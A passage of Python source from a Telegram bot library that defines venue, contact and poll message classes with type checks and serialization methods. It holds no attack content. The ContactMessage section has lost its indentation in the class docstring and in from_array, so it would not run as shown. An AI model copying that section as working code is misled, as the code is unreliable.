    :param google_place_id: Google Places identifier of the venue
    :type  google_place_id: str|unicode

    :param google_place_type: Google Places type of the venue. (See supported types.)
    :type  google_place_type: str|unicode

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """

    def __init__(self, latitude, longitude, title, address, receiver=None, reply_id=DEFAULT_MESSAGE_ID, foursquare_id=None, foursquare_type=None, google_place_id=None, google_place_type=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Use this method to send information about a venue. On success, the sent Message is returned.

        https://core.telegram.org/bots/api#sendvenue

        Parameters are documented on the class docstring; all optional
        parameters accept None meaning "unset".
        """
        super(VenueMessage, self).__init__()
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        # validate each parameter before storing it
        assert_type_or_raise(latitude, float, parameter_name="latitude")
        self.latitude = latitude
        assert_type_or_raise(longitude, float, parameter_name="longitude")
        self.longitude = longitude
        assert_type_or_raise(title, unicode_type, parameter_name="title")
        self.title = title
        assert_type_or_raise(address, unicode_type, parameter_name="address")
        self.address = address
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(foursquare_id, None, unicode_type, parameter_name="foursquare_id")
        self.foursquare_id = foursquare_id
        assert_type_or_raise(foursquare_type, None, unicode_type, parameter_name="foursquare_type")
        self.foursquare_type = foursquare_type
        assert_type_or_raise(google_place_id, None, unicode_type, parameter_name="google_place_id")
        self.google_place_id = google_place_id
        assert_type_or_raise(google_place_type, None, unicode_type, parameter_name="google_place_type")
        self.google_place_type = google_place_type
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        return sender.send_venue(
            latitude=self.latitude,
            longitude=self.longitude,
            title=self.title,
            address=self.address,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            foursquare_id=self.foursquare_id,
            foursquare_type=self.foursquare_type,
            google_place_id=self.google_place_id,
            google_place_type=self.google_place_type,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def actual_send

    def to_array(self):
        """
        Serializes this VenueMessage to a dictionary.

        Optional fields which are unset (None) are omitted from the result
        instead of crashing: the original code called `u(None)` on the
        optional string fields and raised a TypeError for a None `receiver`
        or `reply_markup`, even though the constructor explicitly allows
        None for all of those.

        :return: dictionary representation of this object.
        :rtype: dict
        """
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        array = super(VenueMessage, self).to_array()
        # required fields
        array['latitude'] = float(self.latitude)  # type float
        array['longitude'] = float(self.longitude)  # type float
        array['title'] = u(self.title)  # py2: type unicode, py3: type str
        array['address'] = u(self.address)  # py2: type unicode, py3: type str
        # receiver: optional; None means "use the automatic receiver", so omit the key.
        if self.receiver is not None:
            if isinstance(self.receiver, str):
                array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
            elif isinstance(self.receiver, int):
                array['chat_id'] = int(self.receiver)  # type int
            else:
                raise TypeError('Unknown type, must be one of str, int.')
            # end if
        # end if
        # reply_id: optional; DEFAULT_MESSAGE_ID sentinel or a concrete message id.
        if self.reply_id is not None:
            if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
                array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
            elif isinstance(self.reply_id, int):
                array['reply_to_message_id'] = int(self.reply_id)  # type int
            else:
                raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
            # end if
        # end if
        # optional string fields: serialize only when set.
        if self.foursquare_id is not None:
            array['foursquare_id'] = u(self.foursquare_id)  # py2: type unicode, py3: type str
        # end if
        if self.foursquare_type is not None:
            array['foursquare_type'] = u(self.foursquare_type)  # py2: type unicode, py3: type str
        # end if
        if self.google_place_id is not None:
            array['google_place_id'] = u(self.google_place_id)  # py2: type unicode, py3: type str
        # end if
        if self.google_place_type is not None:
            array['google_place_type'] = u(self.google_place_type)  # py2: type unicode, py3: type str
        # end if
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        # reply_markup: optional; any of the four keyboard/reply types serializes the same way.
        if self.reply_markup is not None:
            if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
                array['reply_markup'] = self.reply_markup.to_array()
            else:
                raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
            # end if
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the VenueMessage constructor.

        Maps wire keys back to constructor parameter names
        ('chat_id' -> 'receiver', 'reply_to_message_id' -> 'reply_id').

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        data = super(VenueMessage, VenueMessage).validate_array(array)
        # required fields: raise when missing
        data['latitude'] = float(array.get('latitude'))
        data['longitude'] = float(array.get('longitude'))
        data['title'] = u(array.get('title'))
        data['address'] = u(array.get('address'))
        # 'chat_id' -> receiver: optional, str or int
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        # 'reply_to_message_id' -> reply_id: optional, DEFAULT_MESSAGE_ID sentinel or int
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            # NOTE(review): stores the sentinel itself, discarding the wrapped
            # value — presumably "reply to the triggering message"; confirm
            # against the sentinel's definition before changing.
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        # optional fields: cast only when present, otherwise keep None
        data['foursquare_id'] = u(array.get('foursquare_id')) if array.get('foursquare_id') is not None else None
        data['foursquare_type'] = u(array.get('foursquare_type')) if array.get('foursquare_type') is not None else None
        data['google_place_id'] = u(array.get('google_place_id')) if array.get('google_place_id') is not None else None
        data['google_place_type'] = u(array.get('google_place_type')) if array.get('google_place_type') is not None else None
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        # 'reply_markup': optional; dispatch deserialization on the concrete keyboard type
        if array.get('reply_markup') is None:
            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new VenueMessage from a given dictionary.

        :return: new VenueMessage instance.
        :rtype: VenueMessage
        """
        if not array:  # None or {}
            return None
        # end if
        data = VenueMessage.validate_array(array)
        return VenueMessage(**data)
    # end def from_array

    def __str__(self):
        """
        Implements `str(venuemessage_instance)`
        """
        return "VenueMessage(latitude={self.latitude!r}, longitude={self.longitude!r}, title={self.title!r}, address={self.address!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, foursquare_id={self.foursquare_id!r}, foursquare_type={self.foursquare_type!r}, google_place_id={self.google_place_id!r}, google_place_type={self.google_place_type!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(venuemessage_instance)`
        """
        return "VenueMessage(latitude={self.latitude!r}, longitude={self.longitude!r}, title={self.title!r}, address={self.address!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, foursquare_id={self.foursquare_id!r}, foursquare_type={self.foursquare_type!r}, google_place_id={self.google_place_id!r}, google_place_type={self.google_place_type!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in venuemessage_instance`
        """
        return (
            key in ["latitude", "longitude", "title", "address", "receiver", "reply_id", "foursquare_id", "foursquare_type", "google_place_id", "google_place_type", "disable_notification", "allow_sending_without_reply", "reply_markup"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class VenueMessage
class ContactMessage(ReturnableMessageBase):
"""
Use this method to send phone contacts. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendcontact
Parameters:
:param phone_number: Contact's phone number
:type phone_number: str|unicode
:param first_name: Contact's first name
:type first_name: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param last_name: Contact's last name
:type last_name: str|unicode
:param vcard: Additional data about the contact in the form of a vCard, 0-2048 bytes
:type vcard: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, phone_number, first_name, receiver=None, reply_id=DEFAULT_MESSAGE_ID, last_name=None, vcard=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
    """
    Use this method to send phone contacts. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendcontact

    Parameters:

    :param phone_number: Contact's phone number
    :type  phone_number: str|unicode

    :param first_name: Contact's first name
    :type  first_name: str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param last_name: Contact's last name
    :type  last_name: str|unicode

    :param vcard: Additional data about the contact in the form of a vCard, 0-2048 bytes
    :type  vcard: str|unicode

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove keyboard or to force a reply from the user.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """
    super(ContactMessage, self).__init__()
    # keyboard types are imported lazily to avoid import cycles at module load
    from pytgbot.api_types.sendable.reply_markup import ForceReply
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
    # validate each parameter before storing it; optional parameters accept None
    assert_type_or_raise(phone_number, unicode_type, parameter_name="phone_number")
    self.phone_number = phone_number
    assert_type_or_raise(first_name, unicode_type, parameter_name="first_name")
    self.first_name = first_name
    assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
    self.receiver = receiver
    assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
    self.reply_id = reply_id
    assert_type_or_raise(last_name, None, unicode_type, parameter_name="last_name")
    self.last_name = last_name
    assert_type_or_raise(vcard, None, unicode_type, parameter_name="vcard")
    self.vcard = vcard
    assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
    self.disable_notification = disable_notification
    assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
    self.allow_sending_without_reply = allow_sending_without_reply
    assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
    self.reply_markup = reply_markup
    # custom variable for message chaining
    self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
    """
    Deliver this contact message through the given pytgbot instance.

    :param sender: The bot instance to send with.
    :type  sender: pytgbot.bot.Bot

    :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
    :type  ignore_reply: bool

    :rtype: PytgbotApiMessage
    """
    # NOTE(review): `ignore_reply` is accepted but not consulted here;
    # `reply_to_message_id` is always forwarded — presumably handled by the
    # caller/base class, confirm against ReturnableMessageBase.
    call_kwargs = dict(
        phone_number=self.phone_number,
        first_name=self.first_name,
        chat_id=self.receiver,
        reply_to_message_id=self.reply_id,
        last_name=self.last_name,
        vcard=self.vcard,
        disable_notification=self.disable_notification,
        allow_sending_without_reply=self.allow_sending_without_reply,
        reply_markup=self.reply_markup,
    )
    return sender.send_contact(**call_kwargs)
# end def actual_send
def to_array(self):
    """
    Serializes this ContactMessage to a dictionary.

    Optional fields which are unset (None) are omitted from the result
    instead of crashing: the original code called `u(None)` on `last_name`
    and `vcard` and raised a TypeError for a None `receiver` or
    `reply_markup`, even though the constructor explicitly allows None
    for all of those.

    :return: dictionary representation of this object.
    :rtype: dict
    """
    from pytgbot.api_types.sendable.reply_markup import ForceReply
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
    array = super(ContactMessage, self).to_array()
    # required fields
    array['phone_number'] = u(self.phone_number)  # py2: type unicode, py3: type str
    array['first_name'] = u(self.first_name)  # py2: type unicode, py3: type str
    # receiver: optional; None means "use the automatic receiver", so omit the key.
    if self.receiver is not None:
        if isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int.')
        # end if
    # end if
    # reply_id: optional; DEFAULT_MESSAGE_ID sentinel or a concrete message id.
    if self.reply_id is not None:
        if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
        # end if
    # end if
    # optional fields: serialize only when set.
    if self.last_name is not None:
        array['last_name'] = u(self.last_name)  # py2: type unicode, py3: type str
    # end if
    if self.vcard is not None:
        array['vcard'] = u(self.vcard)  # py2: type unicode, py3: type str
    # end if
    if self.disable_notification is not None:
        array['disable_notification'] = bool(self.disable_notification)  # type bool
    # end if
    if self.allow_sending_without_reply is not None:
        array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
    # end if
    # reply_markup: optional; any of the four keyboard/reply types serializes the same way.
    if self.reply_markup is not None:
        if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
            array['reply_markup'] = self.reply_markup.to_array()
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
        # end if
    # end if
    return array
# end def to_array
@staticmethod
def validate_array(array):
    """
    Builds a new array with valid values for the ContactMessage constructor.

    Keys in `array` use the telegram wire names (`chat_id`,
    `reply_to_message_id`, ...) and are mapped back to the constructor
    parameter names (`receiver`, `reply_id`, ...).

    :param array: serialized representation, as produced by `to_array()`.
    :type  array: dict

    :return: new array with valid values
    :rtype: dict
    """
    assert_type_or_raise(array, dict, parameter_name="array")
    from pytgbot.api_types.sendable.reply_markup import ForceReply
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
    data = super(ContactMessage, ContactMessage).validate_array(array)
    data['phone_number'] = u(array.get('phone_number'))
    data['first_name'] = u(array.get('first_name'))
    if array.get('chat_id') is None:
        data['receiver'] = None
    elif isinstance(array.get('chat_id'), str):
        data['receiver'] = u(array.get('chat_id'))
    elif isinstance(array.get('chat_id'), int):
        data['receiver'] = int(array.get('chat_id'))
    else:
        raise TypeError('Unknown type, must be one of str, int or None.')
    # end if
    if array.get('reply_to_message_id') is None:
        data['reply_id'] = None
    elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
        # Bug fix: keep the actual sentinel *value*; the previous code
        # assigned the DEFAULT_MESSAGE_ID class itself, losing the id.
        data['reply_id'] = array.get('reply_to_message_id')
    elif isinstance(array.get('reply_to_message_id'), int):
        data['reply_id'] = int(array.get('reply_to_message_id'))
    else:
        raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
    # end if
    data['last_name'] = u(array.get('last_name')) if array.get('last_name') is not None else None
    data['vcard'] = u(array.get('vcard')) if array.get('vcard') is not None else None
    data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
    data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
    if array.get('reply_markup') is None:
        data['reply_markup'] = None
    elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
        data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
        data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
        data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ForceReply):
        data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
    else:
        raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
    # end if
    return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new ContactMessage from a given dictionary.
:return: new ContactMessage instance.
:rtype: ContactMessage
"""
if not array: # None or {}
return None
# end if
data = ContactMessage.validate_array(array)
return ContactMessage(**data)
# end def from_array
def __str__(self):
    """
    Implements `str(contactmessage_instance)`
    """
    # Build "key=value" pairs in the fixed field order, using repr() for values.
    field_names = (
        "phone_number", "first_name", "receiver", "reply_id", "last_name",
        "vcard", "disable_notification", "allow_sending_without_reply",
        "reply_markup",
    )
    rendered = ", ".join(
        "{name}={value!r}".format(name=name, value=getattr(self, name))
        for name in field_names
    )
    return "ContactMessage(" + rendered + ")"
# end def __str__
def __repr__(self):
    """
    Implements `repr(contactmessage_instance)`
    """
    # Same fixed field order as __str__; assembled with %-formatting.
    pairs = []
    for attribute in (
        "phone_number", "first_name", "receiver", "reply_id", "last_name",
        "vcard", "disable_notification", "allow_sending_without_reply",
        "reply_markup",
    ):
        pairs.append("%s=%r" % (attribute, getattr(self, attribute)))
    # end for
    return "ContactMessage(%s)" % ", ".join(pairs)
# end def __repr__
def __contains__(self, key):
    """
    Implements `"key" in contactmessage_instance`

    A key counts as contained only if it is a known field name, the
    attribute exists, and its value is truthy.
    """
    known_fields = (
        "phone_number", "first_name", "receiver", "reply_id", "last_name",
        "vcard", "disable_notification", "allow_sending_without_reply",
        "reply_markup",
    )
    if key not in known_fields:
        return False
    # end if
    if not hasattr(self, key):
        return False
    # end if
    return bool(getattr(self, key, None))
# end def __contains__
# end class ContactMessage
class PollMessage(ReturnableMessageBase):
    """
    Use this method to send a native poll. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendpoll

    Parameters:

    :param question: Poll question, 1-300 characters
    :type  question: str|unicode

    :param options: A JSON-serialized list of answer options, 2-10 strings 1-100 characters each
    :type  options: list of str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param is_anonymous: True, if the poll needs to be anonymous, defaults to True
    :type  is_anonymous: bool

    :param type: Poll type, "quiz" or "regular", defaults to "regular"
    :type  type: str|unicode

    :param allows_multiple_answers: True, if the poll allows multiple answers, ignored for polls in quiz mode, defaults to False
    :type  allows_multiple_answers: bool

    :param correct_option_id: 0-based identifier of the correct answer option, required for polls in quiz mode
    :type  correct_option_id: int

    :param explanation: Text that is shown when a user chooses an incorrect answer or taps on the lamp icon in a quiz-style poll, 0-200 characters with at most 2 line feeds after entities parsing
    :type  explanation: str|unicode

    :param explanation_parse_mode: Mode for parsing entities in the explanation. See formatting options for more details.
    :type  explanation_parse_mode: str|unicode

    :param explanation_entities: A JSON-serialized list of special entities that appear in the poll explanation, which can be specified instead of parse_mode
    :type  explanation_entities: list of pytgbot.api_types.receivable.media.MessageEntity

    :param open_period: Amount of time in seconds the poll will be active after creation, 5-600. Can't be used together with close_date.
    :type  open_period: int

    :param close_date: Point in time (Unix timestamp) when the poll will be automatically closed. Must be at least 5 and no more than 600 seconds in the future. Can't be used together with open_period.
    :type  close_date: int

    :param is_closed: Pass True, if the poll needs to be immediately closed. This can be useful for poll preview.
    :type  is_closed: bool

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """

    def __init__(self, question, options, receiver=None, reply_id=DEFAULT_MESSAGE_ID, is_anonymous=None, type=None, allows_multiple_answers=None, correct_option_id=None, explanation=None, explanation_parse_mode=None, explanation_entities=None, open_period=None, close_date=None, is_closed=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Create a new PollMessage (see https://core.telegram.org/bots/api#sendpoll).

        All parameters are documented in detail on the class docstring of
        :class:`PollMessage`; every value is type-checked here before being
        stored on the instance.
        """
        super(PollMessage, self).__init__()
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        assert_type_or_raise(question, unicode_type, parameter_name="question")
        self.question = question
        assert_type_or_raise(options, list, parameter_name="options")
        self.options = options
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(is_anonymous, None, bool, parameter_name="is_anonymous")
        self.is_anonymous = is_anonymous
        assert_type_or_raise(type, None, unicode_type, parameter_name="type")
        self.type = type
        assert_type_or_raise(allows_multiple_answers, None, bool, parameter_name="allows_multiple_answers")
        self.allows_multiple_answers = allows_multiple_answers
        assert_type_or_raise(correct_option_id, None, int, parameter_name="correct_option_id")
        self.correct_option_id = correct_option_id
        assert_type_or_raise(explanation, None, unicode_type, parameter_name="explanation")
        self.explanation = explanation
        assert_type_or_raise(explanation_parse_mode, None, unicode_type, parameter_name="explanation_parse_mode")
        self.explanation_parse_mode = explanation_parse_mode
        assert_type_or_raise(explanation_entities, None, list, parameter_name="explanation_entities")
        self.explanation_entities = explanation_entities
        assert_type_or_raise(open_period, None, int, parameter_name="open_period")
        self.open_period = open_period
        assert_type_or_raise(close_date, None, int, parameter_name="close_date")
        self.close_date = close_date
        assert_type_or_raise(is_closed, None, bool, parameter_name="is_closed")
        self.is_closed = is_closed
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        return sender.send_poll(
            question=self.question,
            options=self.options,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            is_anonymous=self.is_anonymous,
            type=self.type,
            allows_multiple_answers=self.allows_multiple_answers,
            correct_option_id=self.correct_option_id,
            explanation=self.explanation,
            explanation_parse_mode=self.explanation_parse_mode,
            explanation_entities=self.explanation_entities,
            open_period=self.open_period,
            close_date=self.close_date,
            is_closed=self.is_closed,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def send

    def to_array(self):
        """
        Serializes this PollMessage to a dictionary.

        Optional fields that are `None` are omitted from the result, so that
        `from_array(to_array())` round-trips (previously `None` was coerced to
        the string `'None'` / `False`, and a `None` receiver, reply_id or
        reply_markup raised a TypeError even though the constructor allows it).

        :return: dictionary representation of this object.
        :rtype: dict
        """
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        array = super(PollMessage, self).to_array()
